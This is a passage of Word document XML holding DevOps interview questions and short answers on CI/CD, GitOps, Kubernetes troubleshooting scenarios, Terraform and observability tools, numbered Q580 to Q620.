    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: LaunchDarkly is a feature management platform used to control feature flags, targeting, experimentation, and progressive rollout. It helps teams decouple deployment from feature release.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Launchdarkly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Q581. What is chaos deployment testing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Chaos deployment testing intentionally injects controlled failures around deployment workflows to verify resilience. Examples include killing pods during rollout, simulating network latency, or testing rollback under load.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Chaos Deployment Testing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Q582. Explain pipeline security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pipeline security protects CI/CD systems from compromise by limiting permissions, isolating runners, scanning code and images, securing secrets, validating artifacts, and enforcing approval policies for sensitive deployments.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Pipeline Security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Q583. What are ephemeral environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Ephemeral environments are temporary environments created for a pull request, test, or short-lived task. They improve feedback and reduce shared-environment conflicts, then are destroyed automatically to control cost.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Ephemeral Environments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Q584. Explain preview environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Preview environments are temporary application deployments that let teams review a change before merge or release. They are commonly created per pull request and include realistic configuration, test data, and links for reviewers.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Preview Environments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Q585. What is CI/CD for ML?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CI/CD for ML extends software pipelines with data validation, feature checks, training workflows, experiment tracking, model evaluation, model registry promotion, and controlled model deployment. Both code changes and data changes can trigger the pipeline.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>CI/CD For ML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Q586. Explain model deployment automation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model deployment automation packages, validates, registers, and deploys models with minimal manual work. It includes approval gates, serving configuration, canary rollout, monitoring, and rollback to a previous model version.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Model Deployment Automation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Q587. What is automated rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Automated rollback detects failed releases using health checks or metrics and restores the previous stable version without waiting for manual action. It is most effective when artifacts, configuration, and traffic routing are versioned.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Automated Rollback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Q588. Explain release strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Release strategies are controlled ways to deliver new versions, such as rolling updates, blue-green deployment, canary release, feature flags, and shadow deployment. The choice depends on risk, traffic patterns, rollback needs, and user impact.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Release Strategies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Q589. What are common CI/CD bottlenecks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common CI/CD bottlenecks include slow tests, serial jobs, queue delays, large artifacts, unreliable environments, manual approvals, flaky tests, slow security scans, and unclear ownership of pipeline failures.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Common CI/CD Bottlenecks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Q590. Explain artifact promotion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Artifact promotion moves the same build artifact from one stage to another after validation. This avoids rebuilding between environments and improves traceability from development to production.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Artifact Promotion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Q591. What is environment drift?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Environment drift occurs when environments that should be similar become different over time because of manual changes, inconsistent configuration, or missing automation. Drift causes surprises during testing and deployment.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Environment Drift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Q592. Explain GitOps for Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GitOps for Kubernetes uses Git as the source of truth for manifests, Helm charts, Kustomize overlays, and policies. A controller such as Argo CD or Flux continuously syncs the cluster to the desired state.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>GitOps For Kubernetes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Q593. What is infra drift?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Infrastructure drift happens when real cloud or platform resources differ from the infrastructure-as-code definition. It is detected with plan or drift tools and fixed by updating code or reconciling the environment.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Infra Drift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Q594. Explain pipeline scalability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pipeline scalability is the ability of CI/CD systems to handle more repositories, services, builds, tests, and deployments without becoming slow or unreliable. It requires runner autoscaling, caching, parallelism, templates, and good governance.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Pipeline Scalability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Q595. What is monorepo CI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Monorepo CI handles many projects inside one repository. It should detect changed paths, run only relevant jobs, share common tooling, cache dependencies, and avoid forcing every change to build the entire repository.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Monorepo Ci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Q596. Explain polyrepo pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Polyrepo pipelines manage CI/CD across many separate repositories. They need reusable workflow templates, standardized security checks, dependency coordination, and release orchestration across services.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Polyrepo Pipelines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Q597. What are common GitOps interview scenarios?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common GitOps interview scenarios include drift remediation, rollback, secret management, multi-cluster deployment, environment promotion, failed syncs, Helm/Kustomize issues, and designing GitOps governance for production Kubernetes.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Common GitOps Interview Scenarios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Q598. Design a production-grade GitOps pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A production-grade GitOps pipeline keeps Git as the source of truth, validates manifests in CI, scans images and IaC, signs artifacts, updates environment overlays, and lets Argo CD or Flux reconcile clusters. It includes RBAC, secrets management, admission policies, progressive delivery, observability, rollback, and audit trails.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Production-grade GitOps Pipeline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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Production DevOps Scenario Round (CI/CD, Kubernetes, Terraform, MLOps)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q599. CI/CD pipeline optimization: With ~300 microservices on Kubernetes using Jenkins/Bitbucket, Docker, and Helm, developers report the pipeline takes 30-40 minutes. How would you redesign and optimize it to reduce deployment time?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GitOps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CI/CD pipeline optimization: With ~300 microservices on Kubernetes using Jenkins/Bitbucket, Docker, and Helm, developers report the pipeline takes 30-40 minutes. How would you redesign and optimize it to reduce deployment time?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q600. Further deployment optimization: Beyond optimizing the CI stages, what else would you change around Helm deployments, environment-specific deployments, infrastructure, and application dependencies to cut deployment time further?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GitOps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Further deployment optimization: Beyond optimizing the CI stages, what else would you change around Helm deployments, environment-specific deployments, infrastructure, and application dependencies to cut deployment time further?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q601. Production database migration safety: CI completes successfully, but during CD a database migration corrupts the production database. What controls and pipeline steps would you add to prevent this from happening again?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GitOps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Production database migration safety: CI completes successfully, but during CD a database migration corrupts the production database. What controls and pipeline steps would you add to prevent this from happening again?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q602. How many years of hands-on experience do you have with Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Kubernetes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many years of hands-on experience do you have with Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q603. Scenario: ~60% of the pods across your Kubernetes cluster suddenly enter CrashLoopBackOff. How would you investigate, troubleshoot, and recover from this incident?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Kubernetes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Scenario: ~60% of the pods across your Kubernetes cluster suddenly enter CrashLoopBackOff. How would you investigate, troubleshoot, and recover from this incident?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q604. Tell me about the last time you actually faced a CrashLoopBackOff issue in production. What was the root cause, and how did you resolve it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Kubernetes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Tell me about the last time you actually faced a CrashLoopBackOff issue in production. What was the root cause, and how did you resolve it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q605. Which cloud platform are you currently using day to day - GCP, Azure, AWS, or another cloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP Services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Which cloud platform are you currently using day to day - GCP, Azure, AWS, or another cloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q606. Scenario: worker nodes have plenty of available CPU, but new pods stay Pending when scheduled. What could be the possible reasons, and how would you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Kubernetes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Scenario: worker nodes have plenty of available CPU, but new pods stay Pending when scheduled. What could be the possible reasons, and how would you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q607. If the Kubernetes API server suddenly becomes unavailable, what happens to existing workloads? Do running pods keep working, and what functionality is affected?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Kubernetes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If the Kubernetes API server suddenly becomes unavailable, what happens to existing workloads? Do running pods keep working, and what functionality is affected?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q608. Your application suddenly receives 10x expected traffic and becomes unavailable. How would you design Kubernetes and the surrounding infrastructure so this doesn't happen again?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the SRE/Reliability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Your application suddenly receives 10x expected traffic and becomes unavailable. How would you design Kubernetes and the surrounding infrastructure so this doesn't happen again?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q609. Canary deployment: for the first 30 minutes after upgrading an app on Kubernetes, you want only 5% of users on the new version while 95% stay on stable. How would you implement this?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GitOps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Canary deployment: for the first 30 minutes after upgrading an app on Kubernetes, you want only 5% of users on the new version while 95% stay on stable. How would you implement this?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q610. Have you recently worked on any AI/ML use cases or cloud-based AI services? Explain your experience with services such as Vertex AI, Kubeflow, and Cloud Composer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI Infra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recently worked on any AI/ML use cases or cloud-based AI services? Explain your experience with services such as Vertex AI, Kubeflow, and Cloud Composer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q611. Have you worked on or explored Retrieval-Augmented Generation (RAG) applications? Explain a RAG use case relevant to your domain work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI Infra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Have you worked on or explored Retrieval-Augmented Generation (RAG) applications? Explain a RAG use case relevant to your domain work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q612. You join a project where cloud resources were created manually through the Azure/GCP portal. How would you bring those existing resources under Terraform management without recreating or disrupting them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/IaC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You join a project where cloud resources were created manually through the Azure/GCP portal. How would you bring those existing resources under Terraform management without recreating or disrupting them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q613. Your Terraform state file has become corrupted. How would you recover the state safely without affecting the existing production infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/IaC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Your Terraform state file has become corrupted. How would you recover the state safely without affecting the existing production infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Observability &amp; Monitoring (451–540)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q614. Explain monitoring vs observability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Monitoring tracks known conditions using predefined metrics and alerts, while observability helps investigate unknown or complex behavior. Monitoring tells you something is wrong; observability helps explain why.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Monitoring Vs Observability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Q615. What are logs, metrics, and traces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Logs are event records, metrics are numeric time-series measurements, and traces follow a request across services. Together they provide complementary visibility into system behavior.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Logs, Metrics, And Traces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Q616. Explain Prometheus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Prometheus is an open-source metrics and alerting system that scrapes time-series metrics from targets. It uses PromQL, labels, exporters, and Alertmanager for cloud-native monitoring.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Prometheus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Q617. What is Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Grafana is a visualization and dashboarding platform for metrics, logs, traces, and other data sources. It is commonly used with Prometheus, Loki, Elasticsearch, and cloud monitoring systems.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Grafana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Q618. What is Loki?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Loki is a log aggregation system designed by Grafana Labs. It indexes labels rather than full log text, making it efficient for Kubernetes-style log workloads.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Loki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Q619. What is Jaeger?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Jaeger is an open-source distributed tracing system. It helps visualize request paths, latency, and service dependencies across microservices.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Jaeger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Q620. Explain distributed tracing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
